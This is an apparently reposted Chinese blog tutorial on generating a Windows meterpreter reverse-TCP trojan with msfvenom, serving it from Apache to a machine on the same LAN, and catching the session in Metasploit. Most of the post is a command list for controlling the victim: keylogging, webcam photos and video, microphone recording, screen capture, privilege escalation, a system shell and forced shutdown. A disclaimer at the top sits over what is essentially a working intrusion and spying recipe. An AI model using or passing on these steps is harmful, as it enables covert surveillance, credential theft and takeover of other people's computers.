当前位置:   article > 正文

在Kali Linux下利用MSF生成木马入侵同局域网下的电脑(详细版)_msf入侵电脑

msf入侵电脑

特别声明:本文内容仅供个人参考测试使用,请遵守《中华人民共和国网络安全法》相关法律法规,严禁用于非法用途。

一.生成木马

   生成木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST = <本机IP> LPORT = <端口> -f exe -o 木马文件.exe

二.配置并启动监听

   1.启动MSF:

msfconsole

   2.配置模块:

use exploit/multi/handler

   3.选择攻击模块:

payload windows/meterpreter/reverse_tcp

   4.配置IP:

set LHOST <IP>

   5.配置端口:

set LPORT <端口>

   6.查看配置参数:

show options

   7.后台执行:

exploit -z -j

   8.直接执行监听:

run

三.上传文件

   1.copy文件至网站服务器:

cp 文件 /var/www/html

   2.开启服务:

service apache2 start

   3.靶机获取文件:

<IP>/文件名

四.等待靶机上钩

   1.查看上钩的用户:

sessions

   2.选择攻击的用户:

sessions -i 用户编号

五.攻击命令

   1.监控靶机屏幕:

run vnc -i

   2.实时观看远程用户桌面:

screenshare

   3.抓取交互式桌面屏幕截图:

screenshot

   4.更改meterpreter当前桌面:

setdesktop

   5.获取当前meterpreter桌面:

getdesktop

   6.列出所有可访问的桌面和窗口站:

enumdesktop

   7.开始捕获击键:

keyscan_start

   8.转储按键缓冲:

keyscan_dump

   9.停止捕获击键:

keyscan_stop

   10.发送鼠标事件:

mouse

   11.开始视频聊天:

webcam_chat

   12.列出网络摄像头:

webcam_list

   13.拍照:

webcam_snap

   14.录像:

webcam_strean

   15.录音:

record_mic 秒数

   16.播放波形音频文件:

play <文件>

   17.尝试将权限提升到本地系统权限:

getsystem

   18.打开记事本:

execute -f notepad

   19.放入系统命令shell:

shell

    20.关机:

shutdown

    21.重启:

reboot

以上为本篇文章的所有内容,如有疑问请在评论区指出,谢谢!!!

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/运维做开发/article/detail/766560
推荐阅读
相关标签
  

闽ICP备14008679号